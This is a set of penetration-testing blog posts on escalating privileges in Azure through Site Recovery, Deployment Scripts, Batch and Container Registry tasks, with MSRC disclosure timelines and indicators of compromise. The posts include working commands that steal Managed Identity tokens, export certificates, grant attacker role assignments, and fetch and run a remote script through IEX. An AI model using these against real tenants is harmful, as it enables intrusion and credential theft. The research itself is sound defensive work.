Cloud Penetration Testing - NetSPI

Elevating Privileges with Azure Site Recovery Services

Cleartext credentials are commonly targeted in a penetration test and used to move laterally to other systems, obtain sensitive information, or even further elevate privileges. While this is a low effort finding to exploit, threat actors will utilize cleartext credentials to conduct attacks that could have a high impact for the target environment.

NetSPI discovered a cleartext Azure Access Token for a privileged Managed Identity. This prompted further investigation in which we were able to determine that the vulnerability was caused by the Microsoft-managed Azure Site Recovery service. In this blog, we’ll share the technical details around how we found and reported this vulnerability to Microsoft. Additionally, we’ll cover how the finding was remediated.

TL;DR

  1. The Azure Site Recovery (ASR) service utilizes an Automation Account with a System-Assigned Managed Identity to manage Site Recovery extensions on the enrolled Virtual Machines
  2. The ASR-created Automation Account executes a Runbook that is hidden from the user, but the corresponding Job output for the Runbook remains visible
  3. A cleartext Management-scoped Access Token for the System-Assigned Managed Identity, which has the Contributor role over the entire subscription, was disclosed in the Job output and could be used to authenticate as the Managed Identity
  4. A lower-privileged user role could read this Access Token and authenticate as the Managed Identity, elevating their privileges to a Contributor over the entire subscription
  5. Microsoft has remediated this vulnerability for new and existing Azure Site Recovery deployments as of 02/13/2024

Background

The Azure Site Recovery (ASR) service is used to replicate enrolled Azure resources across different regions, providing replication and failover processes to maintain accessibility during an unplanned outage.

Requirements

The Azure Site Recovery service is not enabled by default. The Azure subscription was vulnerable to this privilege escalation path when:

  1. A Recovery Service Vault was created
  2. Site Recovery was enabled with enrolled Virtual Machines from a different region
  3. Extension Update Settings are turned on

It should be noted that the Azure Site Recovery service needs to be initially configured, and the Extension Update Settings enabled, by an Owner of the subscription. This is because the service attaches the Contributor role to the Managed Identity that is created for the attached Automation Account.

Discovering the Vulnerability

The Extension Update Setting (when enabled) creates a new Automation Account in the Subscription, in this case “blogASR-c99-asr-automationaccount”, which is used to manage the Site Recovery extensions on the enrolled Virtual Machines.

The Automation Account periodically executes a Runbook to ensure the Site Recovery extensions are updated on the enrolled Virtual Machines. This Runbook is hidden from the end user since it’s created by the managed service (ASR).

We were able to determine the name of the Runbook as it is accessible in the JSON view for the Job.

Although the Runbook is hidden from the end user, the Job output remains visible under the Automation Account’s “Jobs” tab.

The Jobs will appear as MS-SR-Update-MobilityServiceForA2AVirtualMachines or MS-ASR-Modify-AutoUpdateForA2AVirtualMachines. Both Jobs contained output that included a cleartext Access Token, truncated in the Portal view.

The Job output also shows that the authentication type is for the System-Assigned Managed Identity. We discovered that this System-Assigned Managed Identity also gets created with the Automation Account.

Searching the Object ID in Entra reveals the “blogASR-c99-asr-automationaccount” Enterprise Application.

The assigned role can be viewed in the subscription's Access Control (IAM). Notice that the Contributor role is granted to the application over the entire subscription.

Elevating Privileges to the System-Assigned Managed Identity

The */read or Microsoft.Automation/automationAccounts/jobs/output/read permissions are required to read the Job output. Depending on the scope, this means lower-privileged user roles such as Reader or Log Analytics Reader (and even more obscure roles like Managed Applications Reader) can view the Access Token to elevate privileges!
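
As a quick way to see which built-in roles qualify, the Az PowerShell module can enumerate role definitions whose action lists explicitly include either permission. This is a minimal sketch: it only checks exact matches, so roles granting broader wildcards (e.g., Microsoft.Automation/*) would also qualify but won't be flagged here.

# List built-in roles whose actions explicitly include either permission
Get-AzRoleDefinition | Where-Object {
    $_.Actions -contains '*/read' -or
    $_.Actions -contains 'Microsoft.Automation/automationAccounts/jobs/output/read'
} | Select-Object Name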

A clear escalation path has now been identified: any lower-privileged user role can view the Job output and see the cleartext Access Token. But how can we retrieve the full Access Token, which is truncated in the Portal view? To demonstrate the escalation path, we used a lower-privileged user (blogReader) with the Reader role.

We can use the Az PowerShell module with the low-privileged user (blogReader) to retrieve the Job output and view the full access token. We simply need to supply the name of the Automation Account, the Job ID, and the Resource Group for the Automation Account. Notice that the Epoch timestamp shows the token will be valid for 24 hours after its creation.

PS > Get-AzContext | FL
Name               : [REDACTED] - blogReader
Account            : blogReader
Environment        : AzureCloud
Subscription       : [REDACTED]
Tenant             : [REDACTED]
PS > Get-AzAutomationJobOutput -AutomationAccountName "blogASR-c99-asr-automationaccount" -Id 39814559-5661-4de3-857b-bb2504c4fcd6 -ResourceGroupName "blogRG2" -Stream "Any" | Get-AzAutomationJobOutputRecord
[TRUNCATED]
Value: {[expires_on, 1704853521], [resource, https://management.core.windows.net/], [token_type, Bearer], [access_token, eyJ0eXAi[REDACTED]]}
[TRUNCATED]
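
As a side note, the expires_on value is a Unix epoch timestamp, so a quick one-liner will translate it to a readable time (using the example value from the output above):

PS > [DateTimeOffset]::FromUnixTimeSeconds(1704853521).LocalDateTime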

With the Access Token and Enterprise Application ID, the low-privileged user (blogReader) can authenticate as the System-Assigned Managed Identity which has the Contributor role on the entire subscription:

PS > $accesstoken = "eyJ0eXAi[REDACTED]"
PS > Connect-AzAccount -AccessToken $accesstoken -AccountId ee7f506d-65d4-492f-acb1-0ddb8e0d29cd
Account Environment   SubscriptionName    TenantId
-------------------   ----------------    -----------
[REDACTED]            [REDACTED]          [REDACTED]

We used the Az PowerShell module to verify the credentials are valid and have the context of a Contributor:

PS > $token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')
PS > while ($token.Length % 4) {$token += "="}
PS > # Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles
PS > Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid
RoleAssignmentName : 721d0fc1-9571-587a-ac51-f71f70b79310
RoleAssignmentId   : /subscriptions/[REDACTED]/providers/Microsoft.Authorization/roleAssignments/721d0fc1-9571-587a-ac51-f71f70b79310
Scope              : /subscriptions/[REDACTED]
DisplayName        :
SignInName         :
RoleDefinitionName : Contributor
RoleDefinitionId   : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId           : cd459283-0d93-47fd-a614-c9280b2634ef
[TRUNCATED]

Potential Impact

Elevating privileges to the Contributor role over the subscription has a high impact for Azure users. Depending on the environment, this vulnerability allows for further elevation within a subscription.

For instance, the Contributor role provides administrative access over Virtual Machines which would allow an attacker to execute “Run Commands” as “NT Authority\SYSTEM”. In cases where Domain Controllers are present in the subscription, this elevation path allows an attacker to compromise the joined Active Directory environment as a Domain Administrator.

PS > Invoke-AzVMRunCommand -ResourceGroupName 'blogRG1' -VMName 'blogDC' -CommandId 'RunPowerShellScript' -ScriptPath 'whoami.ps1'
Value[0]        :
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       : nt authority\system
[TRUNCATED]

Another example, previously outlined by Karl Fosaaen in the NetSPI blog, is abusing access to Cloud Shell images in Storage Accounts. Contributors have read/write access to Cloud Shell images, so they can inject malicious commands into an image and upload the modified image, which will then execute those commands in the context of the user who next starts Cloud Shell.
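
As a rough sketch of how an attacker with the Contributor token might hunt for those images, the following assumes the Cloud Shell file shares use the typical cs-* naming convention and that the storage context returned by Get-AzStorageAccount can authenticate to the file service (both assumptions may not hold in every tenant):

# Look for file shares that follow the typical Cloud Shell naming convention (cs-*)
Get-AzStorageAccount | ForEach-Object {
    $account = $_
    Get-AzStorageShare -Context $account.Context -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like 'cs-*' } |
        Select-Object @{n='StorageAccount';e={$account.StorageAccountName}}, Name
}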

While these circumstances may not be present in every environment, it’s important to understand the impact that this vulnerability can have when it’s abused by an attacker.

Remediation

Microsoft remediated this vulnerability by removing the Access Token from the Automation Account’s Job output.

MSRC Disclosure Timeline

  • 01/09/2024 – The initial report was submitted to MSRC
  • 01/09/2024 – MSRC assigns case number 84800
  • 01/18/2024 – MSRC confirms the vulnerability
  • 02/13/2024 – MSRC pushes a fix for the vulnerability
  • 02/22/2024 – NetSPI verifies the vulnerability has been remediated for new and existing Azure Site Recovery deployments

Special thanks goes out to NetSPI’s Karl Fosaaen and Thomas Elling for contributing to the research for this vulnerability.

Azure Deployment Scripts: Assuming User-Assigned Managed Identities

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription-level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker with the right permissions in a subscription can assign these identities to resources that they control and gain access to the identity's permissions.

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post – “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

Link to the Script – https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only return the role assignments that your authenticated user can read. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but the identity may still have roles in Subscriptions (or Management Groups) that you don't have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment
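
For reference, the resource definition at the heart of that malicious ARM template looks roughly like the following. This is a minimal sketch with illustrative names and API versions, not the exact template the function generates; the key pieces are the identity block attaching the target User-Assigned Managed Identity and a scriptContent payload that logs in as that identity and returns a token.

# Illustrative sketch of a malicious deploymentScripts resource; all names are placeholders
$identityId = '/subscriptions/<subscriptionId>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identityName>'

$template = @{
    '$schema'      = 'https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#'
    contentVersion = '1.0.0.0'
    resources      = @(
        @{
            type       = 'Microsoft.Resources/deploymentScripts'
            apiVersion = '2020-10-01'
            name       = 'exampleDeploymentScript'
            location   = '[resourceGroup().location]'
            kind       = 'AzurePowerShell'
            identity   = @{
                type                   = 'UserAssigned'
                userAssignedIdentities = @{ $identityId = @{} }
            }
            properties = @{
                azPowerShellVersion = '8.3'
                # Log in as the attached identity and write a token to the script output
                scriptContent       = 'Connect-AzAccount -Identity; Write-Output (Get-AzAccessToken).Token'
                retentionInterval   = 'PT1H'
            }
        }
    )
}

# Deploy the template, then read the token back from the deployment script execution log
$template | ConvertTo-Json -Depth 10 | Out-File .\exampleTemplate.json
New-AzResourceGroupDeployment -ResourceGroupName '<rg>' -TemplateFile .\exampleTemplate.json
(Get-AzDeploymentScriptLog -ResourceGroupName '<rg>' -DeploymentScriptName 'exampleDeploymentScript').Log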

Since there isn't an easy way of determining whether your current user can create a Deployment Script in a given Resource Group, the function assumes that you have Contributor (Write) permissions on the Resource Group containing the User-Assigned Managed Identity, and it will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  2. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  3. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.
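
A few illustrative "-Command" payloads for those use cases (all resource names and IDs below are placeholders, and each payload pipes to Out-String so the function gets string output back):

# Run a command on a VM (the -ScriptString parameter requires a newer Az.Compute module)
Invoke-AzUADeploymentScript -Verbose -Command "Invoke-AzVMRunCommand -ResourceGroupName '<rg>' -VMName '<vm>' -CommandId 'RunPowerShellScript' -ScriptString 'whoami' | Out-String"

# Grant an attacker-controlled principal Contributor on the subscription
Invoke-AzUADeploymentScript -Verbose -Command "New-AzRoleAssignment -ObjectId '<attacker-object-id>' -RoleDefinitionName 'Contributor' -Scope '/subscriptions/<subscriptionId>' | Out-String"

# Dump Key Vault secret names the identity can read
Invoke-AzUADeploymentScript -Verbose -Command "Get-AzKeyVaultSecret -VaultName '<vault>' | Out-String"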

Since the function expects string data as the output from the Deployment Script, make sure that you format the output of your "-Command" payload so that your command output is returned as a string.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json"

Lastly, if you're running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your "-Command" parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString('https://example.com/DeploymentExec.ps1') | Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation Name                                        Description
Microsoft.Resources/deployments/validate/action       Validate Deployment
Microsoft.Resources/deployments/write                 Create Deployment
Microsoft.Resources/deploymentScripts/write           Write Deployment Script
Microsoft.Storage/storageAccounts/write               Create/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/action     List Storage Account Keys
Microsoft.ContainerInstance/containerGroups/write     Create/Update Container Group
Microsoft.Resources/deploymentScripts/delete          Delete Deployment Script
Microsoft.Resources/deployments/delete                Delete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

Extracting Sensitive Information from the Azure Batch Service

We've recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we've taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service that we will cover in this blog.

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background – Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The "Resource files" for the pool allow you to select blobs or containers to make available for the "Start Task". The nice thing about this option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.
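
As a quick illustration of the exposure, anyone holding one of these leaked SAS URLs can list and download the container contents without holding any Azure role at all. A short sketch with placeholder values:

# Build a storage context from the leaked SAS token (no Azure credentials required)
$ctx = New-AzStorageContext -StorageAccountName '<account>' -SasToken '<leaked-sas-token>'

# List the blobs in the container referenced by the SAS URL
Get-AzStorageBlob -Container '<container>' -Context $ctx | Select-Object Name, Length

# Download an interesting blob locally
Get-AzStorageBlobContent -Blob '<blob-name>' -Container '<container>' -Context $ctx -Destination .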

The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.
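
Pulling those pool-level environment variables is straightforward with the Az.Batch cmdlets. A minimal sketch, assuming placeholder resource names and an identity that can authenticate to the Batch data plane:

# Get a Batch account context, then dump each pool's start task environment variables
$context = Get-AzBatchAccount -AccountName '<batch-account>' -ResourceGroupName '<rg>'
Get-AzBatchPool -BatchContext $context | Where-Object { $_.StartTask } |
    ForEach-Object { $_.StartTask.EnvironmentSettings | Select-Object Name, Value }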

Service Background – Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there's a User-Assigned Managed Identity that you'd like to generate tokens for that isn't already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult; when we started investigating the service, we had to request a pool quota increase just to start using it. So, plan ahead if you're thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository – https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.
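
The same node access can be scripted with the Az.Batch cmdlets. A sketch with placeholder names, again assuming your identity can reach the Batch data plane:

# Create a temporary local admin user on a target node
$context = Get-AzBatchAccount -AccountName '<batch-account>' -ResourceGroupName '<rg>'
New-AzBatchComputeNodeUser -PoolId '<pool-id>' -ComputeNodeId '<node-id>' -Name 'blogTempAdmin' -Password '<strong-password>' -IsAdmin -BatchContext $context

# Retrieve the public IP and port to use for the SSH/RDP connection
Get-AzBatchRemoteLoginSetting -PoolId '<pool-id>' -ComputeNodeId '<node-id>' -BatchContext $context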

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path Cert:\CurrentUser\My\ | ForEach-Object {
    try {
        Export-PfxCertificate -Cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
        [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
        Remove-Item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    }
    catch {}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = "MII…[Your Base64 Certificate Data]"
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses “TotallyNotaHardcodedPassword…” as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
    • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be ‘by design’. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

Automating Managed Identity Token Extraction in Azure Container Registries

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the “Tasks” functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We’ve created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy-and-pasteable commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR
    • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue
  2. The attacker creates a malicious YAML task file
    • The task authenticates to the Az CLI as the Managed Identity, then generates a token
  3. A Task is created with the AZ CLI and the YAML file
  4. The Task is run in the ACR Task container
  5. The token is written to the Task output, then retrieved by the attacker
If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (az login) with an account with the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  3. Write the following YAML to a local file (.\taskfile):
version: v1.1.0
steps:
  - cmd: az login --identity --allow-no-subscriptions
  - cmd: az account get-access-token
  4. Note that this assumes you are using a System-Assigned Managed Identity; if you're using a User-Assigned Managed Identity, you will need to add "--username <client_id|object_id|resource_id>" to the login command
  5. Create the task in the ACR ($ACRName) with the following command:
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system]
  6. If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentity>") for the identity you want to use
  7. Use the following command to run the task in the ACR:
az acr task run -n sample_acr_task -r $acrName
  8. The task output, including the token, should be displayed in the output for the run command.
  9. Finally, delete the task with the following command:
az acr task delete -n sample_acr_task -r $acrName -y

Please note that while the task may be deleted, the “Runs” of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn’t a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt you (via Out-GridView) for a Subscription to use and for the ACRs that you want to target
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once
  • By default, the function generates tokens for the "Management" (https://management.azure.com/) service
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter
    • Two commonly used options:
      1. https://graph.microsoft.com/ – Used for accessing the Graph API
      2. https://vault.azure.net – Used for accessing the Key Vault API
  • The output is a Data Table Object that can be assigned to a variable
    • $tokens = Invoke-AzACRTokenGenerator
    • This can also be appended with a "+=" to add tokens to the object, which is handy for storing multiple token scopes (Management, Graph, Vault) in one object

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 


Indicators of Compromise (IoCs) 

To better support the defenders out there, we’ve included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name                                                     Description
Microsoft.ContainerRegistry/registries/tasks/write                 Create or update a task for a container registry
Microsoft.ContainerRegistry/registries/scheduleRun/action          Schedule a run against a container registry
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action   Get the log SAS URL for a run
Microsoft.ContainerRegistry/registries/tasks/delete                Delete a task for a container registry

Conclusion 

The Azure ACR Tasks functionality is very helpful for automating the lifecycle of a container, but permission misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.

